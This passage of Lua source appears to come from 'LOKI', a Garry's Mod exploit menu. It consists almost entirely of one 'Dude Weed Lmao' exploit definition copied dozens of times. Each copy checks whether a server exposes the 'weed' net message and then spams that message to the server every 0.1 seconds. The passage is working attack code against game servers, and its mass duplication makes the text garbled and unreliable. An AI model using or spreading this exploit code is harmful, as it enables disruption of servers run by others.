  3749. LOKI.AddExploit( "Dude Weed Lmao", {
  3750. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3751. severity = 1,
  3752. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3753. functions = {
  3754. { typ = "func", name = "Big Weed", func = function()
  3755. if !timer.Exists( "loki_bonghit" ) then
  3756. timer.Create( "loki_bonghit", 0.1, 0, function()
  3757. net.Start( "weed" )
  3758. net.WriteString( "DUDE" )
  3759. net.SendToServer()
  3760. end)
  3761. else
  3762. timer.Remove( "loki_bonghit" )
  3763. end
  3764. end, },
  3765. },
  3766. } )
  3767.  
  3768. LOKI.AddExploit( "Dude Weed Lmao", {
  3769. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3770. severity = 1,
  3771. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3772. functions = {
  3773. { typ = "func", name = "Big Weed", func = function()
  3774. if !timer.Exists( "loki_bonghit" ) then
  3775. timer.Create( "loki_bonghit", 0.1, 0, function()
  3776. net.Start( "weed" )
  3777. net.WriteString( "DUDE" )
  3778. net.SendToServer()
  3779. end)
  3780. else
  3781. timer.Remove( "loki_bonghit" )
  3782. end
  3783. end, },
  3784. },
  3785. } )
  3786.  
  3787. LOKI.AddExploit( "Dude Weed Lmao", {
  3788. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3789. severity = 1,
  3790. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3791. functions = {
  3792. { typ = "func", name = "Big Weed", func = function()
  3793. if !timer.Exists( "loki_bonghit" ) then
  3794. timer.Create( "loki_bonghit", 0.1, 0, function()
  3795. net.Start( "weed" )
  3796. net.WriteString( "DUDE" )
  3797. net.SendToServer()
  3798. end)
  3799. else
  3800. timer.Remove( "loki_bonghit" )
  3801. end
  3802. end, },
  3803. },
  3804. } )
  3805.  
  3806. LOKI.AddExploit( "Dude Weed Lmao", {
  3807. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3808. severity = 1,
  3809. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3810. functions = {
  3811. { typ = "func", name = "Big Weed", func = function()
  3812. if !timer.Exists( "loki_bonghit" ) then
  3813. timer.Create( "loki_bonghit", 0.1, 0, function()
  3814. net.Start( "weed" )
  3815. net.WriteString( "DUDE" )
  3816. net.SendToServer()
  3817. end)
  3818. else
  3819. timer.Remove( "loki_bonghit" )
  3820. end
  3821. end, },
  3822. },
  3823. } )
  3824.  
  3825. LOKI.AddExploit( "Dude Weed Lmao", {
  3826. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3827. severity = 1,
  3828. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3829. functions = {
  3830. { typ = "func", name = "Big Weed", func = function()
  3831. if !timer.Exists( "loki_bonghit" ) then
  3832. timer.Create( "loki_bonghit", 0.1, 0, function()
  3833. net.Start( "weed" )
  3834. net.WriteString( "DUDE" )
  3835. net.SendToServer()
  3836. end)
  3837. else
  3838. timer.Remove( "loki_bonghit" )
  3839. end
  3840. end, },
  3841. },
  3842. } )
  3843.  
  3844. LOKI.AddExploit( "Dude Weed Lmao", {
  3845. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3846. severity = 1,
  3847. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3848. functions = {
  3849. { typ = "func", name = "Big Weed", func = function()
  3850. if !timer.Exists( "loki_bonghit" ) then
  3851. timer.Create( "loki_bonghit", 0.1, 0, function()
  3852. net.Start( "weed" )
  3853. net.WriteString( "DUDE" )
  3854. net.SendToServer()
  3855. end)
  3856. else
  3857. timer.Remove( "loki_bonghit" )
  3858. end
  3859. end, },
  3860. },
  3861. } )
  3862.  
  3863. LOKI.AddExploit( "Dude Weed Lmao", {
  3864. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3865. severity = 1,
  3866. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3867. functions = {
  3868. { typ = "func", name = "Big Weed", func = function()
  3869. if !timer.Exists( "loki_bonghit" ) then
  3870. timer.Create( "loki_bonghit", 0.1, 0, function()
  3871. net.Start( "weed" )
  3872. net.WriteString( "DUDE" )
  3873. net.SendToServer()
  3874. end)
  3875. else
  3876. timer.Remove( "loki_bonghit" )
  3877. end
  3878. end, },
  3879. },
  3880. } )
  3881.  
  3882. LOKI.AddExploit( "Dude Weed Lmao", {
  3883. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3884. severity = 1,
  3885. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3886. functions = {
  3887. { typ = "func", name = "Big Weed", func = function()
  3888. if !timer.Exists( "loki_bonghit" ) then
  3889. timer.Create( "loki_bonghit", 0.1, 0, function()
  3890. net.Start( "weed" )
  3891. net.WriteString( "DUDE" )
  3892. net.SendToServer()
  3893. end)
  3894. else
  3895. timer.Remove( "loki_bonghit" )
  3896. end
  3897. end, },
  3898. },
  3899. } )
  3900.  
  3901. LOKI.AddExploit( "Dude Weed Lmao", {
  3902. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3903. severity = 1,
  3904. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3905. functions = {
  3906. { typ = "func", name = "Big Weed", func = function()
  3907. if !timer.Exists( "loki_bonghit" ) then
  3908. timer.Create( "loki_bonghit", 0.1, 0, function()
  3909. net.Start( "weed" )
  3910. net.WriteString( "DUDE" )
  3911. net.SendToServer()
  3912. end)
  3913. else
  3914. timer.Remove( "loki_bonghit" )
  3915. end
  3916. end, },
  3917. },
  3918. } )
  3919.  
  3920. LOKI.AddExploit( "Dude Weed Lmao", {
  3921. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3922. severity = 1,
  3923. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3924. functions = {
  3925. { typ = "func", name = "Big Weed", func = function()
  3926. if !timer.Exists( "loki_bonghit" ) then
  3927. timer.Create( "loki_bonghit", 0.1, 0, function()
  3928. net.Start( "weed" )
  3929. net.WriteString( "DUDE" )
  3930. net.SendToServer()
  3931. end)
  3932. else
  3933. timer.Remove( "loki_bonghit" )
  3934. end
  3935. end, },
  3936. },
  3937. } )
  3938.  
  3939. LOKI.AddExploit( "Dude Weed Lmao", {
  3940. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3941. severity = 1,
  3942. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3943. functions = {
  3944. { typ = "func", name = "Big Weed", func = function()
  3945. if !timer.Exists( "loki_bonghit" ) then
  3946. timer.Create( "loki_bonghit", 0.1, 0, function()
  3947. net.Start( "weed" )
  3948. net.WriteString( "DUDE" )
  3949. net.SendToServer()
  3950. end)
  3951. else
  3952. timer.Remove( "loki_bonghit" )
  3953. end
  3954. end, },
  3955. },
  3956. } )
  3957.  
  3958. LOKI.AddExploit( "Dude Weed Lmao", {
  3959. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3960. severity = 1,
  3961. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3962. functions = {
  3963. { typ = "func", name = "Big Weed", func = function()
  3964. if !timer.Exists( "loki_bonghit" ) then
  3965. timer.Create( "loki_bonghit", 0.1, 0, function()
  3966. net.Start( "weed" )
  3967. net.WriteString( "DUDE" )
  3968. net.SendToServer()
  3969. end)
  3970. else
  3971. timer.Remove( "loki_bonghit" )
  3972. end
  3973. end, },
  3974. },
  3975. } )
  3976.  
  3977. LOKI.AddExploit( "Dude Weed Lmao", {
  3978. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3979. severity = 1,
  3980. scan = function() return LOKI.ValidNetString( "weed" ) end,
  3981. functions = {
  3982. { typ = "func", name = "Big Weed", func = function()
  3983. if !timer.Exists( "loki_bonghit" ) then
  3984. timer.Create( "loki_bonghit", 0.1, 0, function()
  3985. net.Start( "weed" )
  3986. net.WriteString( "DUDE" )
  3987. net.SendToServer()
  3988. end)
  3989. else
  3990. timer.Remove( "loki_bonghit" )
  3991. end
  3992. end, },
  3993. },
  3994. } )
  3995.  
  3996. LOKI.AddExploit( "Dude Weed Lmao", {
  3997. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  3998. severity = 1,
  3999. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4000. functions = {
  4001. { typ = "func", name = "Big Weed", func = function()
  4002. if !timer.Exists( "loki_bonghit" ) then
  4003. timer.Create( "loki_bonghit", 0.1, 0, function()
  4004. net.Start( "weed" )
  4005. net.WriteString( "DUDE" )
  4006. net.SendToServer()
  4007. end)
  4008. else
  4009. timer.Remove( "loki_bonghit" )
  4010. end
  4011. end, },
  4012. },
  4013. } )
  4014.  
  4015. LOKI.AddExploit( "Dude Weed Lmao", {
  4016. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4017. severity = 1,
  4018. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4019. functions = {
  4020. { typ = "func", name = "Big Weed", func = function()
  4021. if !timer.Exists( "loki_bonghit" ) then
  4022. timer.Create( "loki_bonghit", 0.1, 0, function()
  4023. net.Start( "weed" )
  4024. net.WriteString( "DUDE" )
  4025. net.SendToServer()
  4026. end)
  4027. else
  4028. timer.Remove( "loki_bonghit" )
  4029. end
  4030. end, },
  4031. },
  4032. } )
  4033.  
  4034. LOKI.AddExploit( "Dude Weed Lmao", {
  4035. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4036. severity = 1,
  4037. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4038. functions = {
  4039. { typ = "func", name = "Big Weed", func = function()
  4040. if !timer.Exists( "loki_bonghit" ) then
  4041. timer.Create( "loki_bonghit", 0.1, 0, function()
  4042. net.Start( "weed" )
  4043. net.WriteString( "DUDE" )
  4044. net.SendToServer()
  4045. end)
  4046. else
  4047. timer.Remove( "loki_bonghit" )
  4048. end
  4049. end, },
  4050. },
  4051. } )
  4052.  
  4053. LOKI.AddExploit( "Dude Weed Lmao", {
  4054. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4055. severity = 1,
  4056. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4057. functions = {
  4058. { typ = "func", name = "Big Weed", func = function()
  4059. if !timer.Exists( "loki_bonghit" ) then
  4060. timer.Create( "loki_bonghit", 0.1, 0, function()
  4061. net.Start( "weed" )
  4062. net.WriteString( "DUDE" )
  4063. net.SendToServer()
  4064. end)
  4065. else
  4066. timer.Remove( "loki_bonghit" )
  4067. end
  4068. end, },
  4069. },
  4070. } )
  4071.  
  4072. LOKI.AddExploit( "Dude Weed Lmao", {
  4073. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4074. severity = 1,
  4075. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4076. functions = {
  4077. { typ = "func", name = "Big Weed", func = function()
  4078. if !timer.Exists( "loki_bonghit" ) then
  4079. timer.Create( "loki_bonghit", 0.1, 0, function()
  4080. net.Start( "weed" )
  4081. net.WriteString( "DUDE" )
  4082. net.SendToServer()
  4083. end)
  4084. else
  4085. timer.Remove( "loki_bonghit" )
  4086. end
  4087. end, },
  4088. },
  4089. } )
  4090.  
  4091. LOKI.AddExploit( "Dude Weed Lmao", {
  4092. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4093. severity = 1,
  4094. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4095. functions = {
  4096. { typ = "func", name = "Big Weed", func = function()
  4097. if !timer.Exists( "loki_bonghit" ) then
  4098. timer.Create( "loki_bonghit", 0.1, 0, function()
  4099. net.Start( "weed" )
  4100. net.WriteString( "DUDE" )
  4101. net.SendToServer()
  4102. end)
  4103. else
  4104. timer.Remove( "loki_bonghit" )
  4105. end
  4106. end, },
  4107. },
  4108. } )
  4109.  
  4110. LOKI.AddExploit( "Dude Weed Lmao", {
  4111. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4112. severity = 1,
  4113. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4114. functions = {
  4115. { typ = "func", name = "Big Weed", func = function()
  4116. if !timer.Exists( "loki_bonghit" ) then
  4117. timer.Create( "loki_bonghit", 0.1, 0, function()
  4118. net.Start( "weed" )
  4119. net.WriteString( "DUDE" )
  4120. net.SendToServer()
  4121. end)
  4122. else
  4123. timer.Remove( "loki_bonghit" )
  4124. end
  4125. end, },
  4126. },
  4127. } )
  4128.  
  4129. LOKI.AddExploit( "Dude Weed Lmao", {
  4130. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4131. severity = 1,
  4132. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4133. functions = {
  4134. { typ = "func", name = "Big Weed", func = function()
  4135. if !timer.Exists( "loki_bonghit" ) then
  4136. timer.Create( "loki_bonghit", 0.1, 0, function()
  4137. net.Start( "weed" )
  4138. net.WriteString( "DUDE" )
  4139. net.SendToServer()
  4140. end)
  4141. else
  4142. timer.Remove( "loki_bonghit" )
  4143. end
  4144. end, },
  4145. },
  4146. } )
  4147.  
  4148. LOKI.AddExploit( "Dude Weed Lmao", {
  4149. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4150. severity = 1,
  4151. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4152. functions = {
  4153. { typ = "func", name = "Big Weed", func = function()
  4154. if !timer.Exists( "loki_bonghit" ) then
  4155. timer.Create( "loki_bonghit", 0.1, 0, function()
  4156. net.Start( "weed" )
  4157. net.WriteString( "DUDE" )
  4158. net.SendToServer()
  4159. end)
  4160. else
  4161. timer.Remove( "loki_bonghit" )
  4162. end
  4163. end, },
  4164. },
  4165. } )
  4166.  
  4167. LOKI.AddExploit( "Dude Weed Lmao", {
  4168. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4169. severity = 1,
  4170. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4171. functions = {
  4172. { typ = "func", name = "Big Weed", func = function()
  4173. if !timer.Exists( "loki_bonghit" ) then
  4174. timer.Create( "loki_bonghit", 0.1, 0, function()
  4175. net.Start( "weed" )
  4176. net.WriteString( "DUDE" )
  4177. net.SendToServer()
  4178. end)
  4179. else
  4180. timer.Remove( "loki_bonghit" )
  4181. end
  4182. end, },
  4183. },
  4184. } )
  4185.  
  4186. LOKI.AddExploit( "Dude Weed Lmao", {
  4187. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4188. severity = 1,
  4189. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4190. functions = {
  4191. { typ = "func", name = "Big Weed", func = function()
  4192. if !timer.Exists( "loki_bonghit" ) then
  4193. timer.Create( "loki_bonghit", 0.1, 0, function()
  4194. net.Start( "weed" )
  4195. net.WriteString( "DUDE" )
  4196. net.SendToServer()
  4197. end)
  4198. else
  4199. timer.Remove( "loki_bonghit" )
  4200. end
  4201. end, },
  4202. },
  4203. } )
  4204.  
  4205. LOKI.AddExploit( "Dude Weed Lmao", {
  4206. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4207. severity = 1,
  4208. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4209. functions = {
  4210. { typ = "func", name = "Big Weed", func = function()
  4211. if !timer.Exists( "loki_bonghit" ) then
  4212. timer.Create( "loki_bonghit", 0.1, 0, function()
  4213. net.Start( "weed" )
  4214. net.WriteString( "DUDE" )
  4215. net.SendToServer()
  4216. end)
  4217. else
  4218. timer.Remove( "loki_bonghit" )
  4219. end
  4220. end, },
  4221. },
  4222. } )
  4223.  
  4224. LOKI.AddExploit( "Dude Weed Lmao", {
  4225. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4226. severity = 1,
  4227. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4228. functions = {
  4229. { typ = "func", name = "Big Weed", func = function()
  4230. if !timer.Exists( "loki_bonghit" ) then
  4231. timer.Create( "loki_bonghit", 0.1, 0, function()
  4232. net.Start( "weed" )
  4233. net.WriteString( "DUDE" )
  4234. net.SendToServer()
  4235. end)
  4236. else
  4237. timer.Remove( "loki_bonghit" )
  4238. end
  4239. end, },
  4240. },
  4241. } )
  4242.  
  4243. LOKI.AddExploit( "Dude Weed Lmao", {
  4244. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4245. severity = 1,
  4246. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4247. functions = {
  4248. { typ = "func", name = "Big Weed", func = function()
  4249. if !timer.Exists( "loki_bonghit" ) then
  4250. timer.Create( "loki_bonghit", 0.1, 0, function()
  4251. net.Start( "weed" )
  4252. net.WriteString( "DUDE" )
  4253. net.SendToServer()
  4254. end)
  4255. else
  4256. timer.Remove( "loki_bonghit" )
  4257. end
  4258. end, },
  4259. },
  4260. } )
  4261.  
  4262. LOKI.AddExploit( "Dude Weed Lmao", {
  4263. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4264. severity = 1,
  4265. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4266. functions = {
  4267. { typ = "func", name = "Big Weed", func = function()
  4268. if !timer.Exists( "loki_bonghit" ) then
  4269. timer.Create( "loki_bonghit", 0.1, 0, function()
  4270. net.Start( "weed" )
  4271. net.WriteString( "DUDE" )
  4272. net.SendToServer()
  4273. end)
  4274. else
  4275. timer.Remove( "loki_bonghit" )
  4276. end
  4277. end, },
  4278. },
  4279. } )
  4280.  
  4281. LOKI.AddExploit( "Dude Weed Lmao", {
  4282. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4283. severity = 1,
  4284. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4285. functions = {
  4286. { typ = "func", name = "Big Weed", func = function()
  4287. if !timer.Exists( "loki_bonghit" ) then
  4288. timer.Create( "loki_bonghit", 0.1, 0, function()
  4289. net.Start( "weed" )
  4290. net.WriteString( "DUDE" )
  4291. net.SendToServer()
  4292. end)
  4293. else
  4294. timer.Remove( "loki_bonghit" )
  4295. end
  4296. end, },
  4297. },
  4298. } )
  4299.  
  4300. LOKI.AddExploit( "Dude Weed Lmao", {
  4301. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4302. severity = 1,
  4303. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4304. functions = {
  4305. { typ = "func", name = "Big Weed", func = function()
  4306. if !timer.Exists( "loki_bonghit" ) then
  4307. timer.Create( "loki_bonghit", 0.1, 0, function()
  4308. net.Start( "weed" )
  4309. net.WriteString( "DUDE" )
  4310. net.SendToServer()
  4311. end)
  4312. else
  4313. timer.Remove( "loki_bonghit" )
  4314. end
  4315. end, },
  4316. },
  4317. } )
  4318.  
  4319. LOKI.AddExploit( "Dude Weed Lmao", {
  4320. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4321. severity = 1,
  4322. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4323. functions = {
  4324. { typ = "func", name = "Big Weed", func = function()
  4325. if !timer.Exists( "loki_bonghit" ) then
  4326. timer.Create( "loki_bonghit", 0.1, 0, function()
  4327. net.Start( "weed" )
  4328. net.WriteString( "DUDE" )
  4329. net.SendToServer()
  4330. end)
  4331. else
  4332. timer.Remove( "loki_bonghit" )
  4333. end
  4334. end, },
  4335. },
  4336. } )
  4337.  
  4338. LOKI.AddExploit( "Dude Weed Lmao", {
  4339. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4340. severity = 1,
  4341. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4342. functions = {
  4343. { typ = "func", name = "Big Weed", func = function()
  4344. if !timer.Exists( "loki_bonghit" ) then
  4345. timer.Create( "loki_bonghit", 0.1, 0, function()
  4346. net.Start( "weed" )
  4347. net.WriteString( "DUDE" )
  4348. net.SendToServer()
  4349. end)
  4350. else
  4351. timer.Remove( "loki_bonghit" )
  4352. end
  4353. end, },
  4354. },
  4355. } )
  4356.  
  4357. LOKI.AddExploit( "Dude Weed Lmao", {
  4358. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4359. severity = 1,
  4360. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4361. functions = {
  4362. { typ = "func", name = "Big Weed", func = function()
  4363. if !timer.Exists( "loki_bonghit" ) then
  4364. timer.Create( "loki_bonghit", 0.1, 0, function()
  4365. net.Start( "weed" )
  4366. net.WriteString( "DUDE" )
  4367. net.SendToServer()
  4368. end)
  4369. else
  4370. timer.Remove( "loki_bonghit" )
  4371. end
  4372. end, },
  4373. },
  4374. } )
  4375.  
  4376. LOKI.AddExploit( "Dude Weed Lmao", {
  4377. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4378. severity = 1,
  4379. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4380. functions = {
  4381. { typ = "func", name = "Big Weed", func = function()
  4382. if !timer.Exists( "loki_bonghit" ) then
  4383. timer.Create( "loki_bonghit", 0.1, 0, function()
  4384. net.Start( "weed" )
  4385. net.WriteString( "DUDE" )
  4386. net.SendToServer()
  4387. end)
  4388. else
  4389. timer.Remove( "loki_bonghit" )
  4390. end
  4391. end, },
  4392. },
  4393. } )
  4394.  
  4395. LOKI.AddExploit( "Dude Weed Lmao", {
  4396. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4397. severity = 1,
  4398. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4399. functions = {
  4400. { typ = "func", name = "Big Weed", func = function()
  4401. if !timer.Exists( "loki_bonghit" ) then
  4402. timer.Create( "loki_bonghit", 0.1, 0, function()
  4403. net.Start( "weed" )
  4404. net.WriteString( "DUDE" )
  4405. net.SendToServer()
  4406. end)
  4407. else
  4408. timer.Remove( "loki_bonghit" )
  4409. end
  4410. end, },
  4411. },
  4412. } )
  4413.  
  4414. LOKI.AddExploit( "Dude Weed Lmao", {
  4415. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4416. severity = 1,
  4417. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4418. functions = {
  4419. { typ = "func", name = "Big Weed", func = function()
  4420. if !timer.Exists( "loki_bonghit" ) then
  4421. timer.Create( "loki_bonghit", 0.1, 0, function()
  4422. net.Start( "weed" )
  4423. net.WriteString( "DUDE" )
  4424. net.SendToServer()
  4425. end)
  4426. else
  4427. timer.Remove( "loki_bonghit" )
  4428. end
  4429. end, },
  4430. },
  4431. } )
  4432.  
  4433. LOKI.AddExploit( "Dude Weed Lmao", {
  4434. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4435. severity = 1,
  4436. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4437. functions = {
  4438. { typ = "func", name = "Big Weed", func = function()
  4439. if !timer.Exists( "loki_bonghit" ) then
  4440. timer.Create( "loki_bonghit", 0.1, 0, function()
  4441. net.Start( "weed" )
  4442. net.WriteString( "DUDE" )
  4443. net.SendToServer()
  4444. end)
  4445. else
  4446. timer.Remove( "loki_bonghit" )
  4447. end
  4448. end, },
  4449. },
  4450. } )
  4451.  
  4452. LOKI.AddExploit( "Dude Weed Lmao", {
  4453. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4454. severity = 1,
  4455. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4456. functions = {
  4457. { typ = "func", name = "Big Weed", func = function()
  4458. if !timer.Exists( "loki_bonghit" ) then
  4459. timer.Create( "loki_bonghit", 0.1, 0, function()
  4460. net.Start( "weed" )
  4461. net.WriteString( "DUDE" )
  4462. net.SendToServer()
  4463. end)
  4464. else
  4465. timer.Remove( "loki_bonghit" )
  4466. end
  4467. end, },
  4468. },
  4469. } )
  4470.  
  4471. LOKI.AddExploit( "Dude Weed Lmao", {
  4472. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4473. severity = 1,
  4474. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4475. functions = {
  4476. { typ = "func", name = "Big Weed", func = function()
  4477. if !timer.Exists( "loki_bonghit" ) then
  4478. timer.Create( "loki_bonghit", 0.1, 0, function()
  4479. net.Start( "weed" )
  4480. net.WriteString( "DUDE" )
  4481. net.SendToServer()
  4482. end)
  4483. else
  4484. timer.Remove( "loki_bonghit" )
  4485. end
  4486. end, },
  4487. },
  4488. } )
  4489.  
  4490. LOKI.AddExploit( "Dude Weed Lmao", {
  4491. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4492. severity = 1,
  4493. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4494. functions = {
  4495. { typ = "func", name = "Big Weed", func = function()
  4496. if !timer.Exists( "loki_bonghit" ) then
  4497. timer.Create( "loki_bonghit", 0.1, 0, function()
  4498. net.Start( "weed" )
  4499. net.WriteString( "DUDE" )
  4500. net.SendToServer()
  4501. end)
  4502. else
  4503. timer.Remove( "loki_bonghit" )
  4504. end
  4505. end, },
  4506. },
  4507. } )
  4508.  
  4509. LOKI.AddExploit( "Dude Weed Lmao", {
  4510. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4511. severity = 1,
  4512. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4513. functions = {
  4514. { typ = "func", name = "Big Weed", func = function()
  4515. if !timer.Exists( "loki_bonghit" ) then
  4516. timer.Create( "loki_bonghit", 0.1, 0, function()
  4517. net.Start( "weed" )
  4518. net.WriteString( "DUDE" )
  4519. net.SendToServer()
  4520. end)
  4521. else
  4522. timer.Remove( "loki_bonghit" )
  4523. end
  4524. end, },
  4525. },
  4526. } )
  4527.  
  4528. LOKI.AddExploit( "Dude Weed Lmao", {
  4529. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4530. severity = 1,
  4531. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4532. functions = {
  4533. { typ = "func", name = "Big Weed", func = function()
  4534. if !timer.Exists( "loki_bonghit" ) then
  4535. timer.Create( "loki_bonghit", 0.1, 0, function()
  4536. net.Start( "weed" )
  4537. net.WriteString( "DUDE" )
  4538. net.SendToServer()
  4539. end)
  4540. else
  4541. timer.Remove( "loki_bonghit" )
  4542. end
  4543. end, },
  4544. },
  4545. } )
  4546.  
  4547. LOKI.AddExploit( "Dude Weed Lmao", {
  4548. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4549. severity = 1,
  4550. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4551. functions = {
  4552. { typ = "func", name = "Big Weed", func = function()
  4553. if !timer.Exists( "loki_bonghit" ) then
  4554. timer.Create( "loki_bonghit", 0.1, 0, function()
  4555. net.Start( "weed" )
  4556. net.WriteString( "DUDE" )
  4557. net.SendToServer()
  4558. end)
  4559. else
  4560. timer.Remove( "loki_bonghit" )
  4561. end
  4562. end, },
  4563. },
  4564. } )
  4565.  
  4566. LOKI.AddExploit( "Dude Weed Lmao", {
  4567. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4568. severity = 1,
  4569. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4570. functions = {
  4571. { typ = "func", name = "Big Weed", func = function()
  4572. if !timer.Exists( "loki_bonghit" ) then
  4573. timer.Create( "loki_bonghit", 0.1, 0, function()
  4574. net.Start( "weed" )
  4575. net.WriteString( "DUDE" )
  4576. net.SendToServer()
  4577. end)
  4578. else
  4579. timer.Remove( "loki_bonghit" )
  4580. end
  4581. end, },
  4582. },
  4583. } )
  4584.  
  4585. LOKI.AddExploit( "Dude Weed Lmao", {
  4586. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4587. severity = 1,
  4588. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4589. functions = {
  4590. { typ = "func", name = "Big Weed", func = function()
  4591. if !timer.Exists( "loki_bonghit" ) then
  4592. timer.Create( "loki_bonghit", 0.1, 0, function()
  4593. net.Start( "weed" )
  4594. net.WriteString( "DUDE" )
  4595. net.SendToServer()
  4596. end)
  4597. else
  4598. timer.Remove( "loki_bonghit" )
  4599. end
  4600. end, },
  4601. },
  4602. } )
  4603.  
  4604. LOKI.AddExploit( "Dude Weed Lmao", {
  4605. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4606. severity = 1,
  4607. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4608. functions = {
  4609. { typ = "func", name = "Big Weed", func = function()
  4610. if !timer.Exists( "loki_bonghit" ) then
  4611. timer.Create( "loki_bonghit", 0.1, 0, function()
  4612. net.Start( "weed" )
  4613. net.WriteString( "DUDE" )
  4614. net.SendToServer()
  4615. end)
  4616. else
  4617. timer.Remove( "loki_bonghit" )
  4618. end
  4619. end, },
  4620. },
  4621. } )
  4622.  
  4623. LOKI.AddExploit( "Dude Weed Lmao", {
  4624. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4625. severity = 1,
  4626. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4627. functions = {
  4628. { typ = "func", name = "Big Weed", func = function()
  4629. if !timer.Exists( "loki_bonghit" ) then
  4630. timer.Create( "loki_bonghit", 0.1, 0, function()
  4631. net.Start( "weed" )
  4632. net.WriteString( "DUDE" )
  4633. net.SendToServer()
  4634. end)
  4635. else
  4636. timer.Remove( "loki_bonghit" )
  4637. end
  4638. end, },
  4639. },
  4640. } )
  4641.  
  4642. LOKI.AddExploit( "Dude Weed Lmao", {
  4643. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4644. severity = 1,
  4645. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4646. functions = {
  4647. { typ = "func", name = "Big Weed", func = function()
  4648. if !timer.Exists( "loki_bonghit" ) then
  4649. timer.Create( "loki_bonghit", 0.1, 0, function()
  4650. net.Start( "weed" )
  4651. net.WriteString( "DUDE" )
  4652. net.SendToServer()
  4653. end)
  4654. else
  4655. timer.Remove( "loki_bonghit" )
  4656. end
  4657. end, },
  4658. },
  4659. } )
  4660.  
  4661. LOKI.AddExploit( "Dude Weed Lmao", {
  4662. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  4663. severity = 1,
  4664. scan = function() return LOKI.ValidNetString( "weed" ) end,
  4665. functions = {
  4666. { typ = "func", name = "Big Weed", func = function()
  4667. if !timer.Exists( "loki_bonghit" ) then
  4668. timer.Create( "loki_bonghit", 0.1, 0, function()
  4669. net.Start( "weed" )
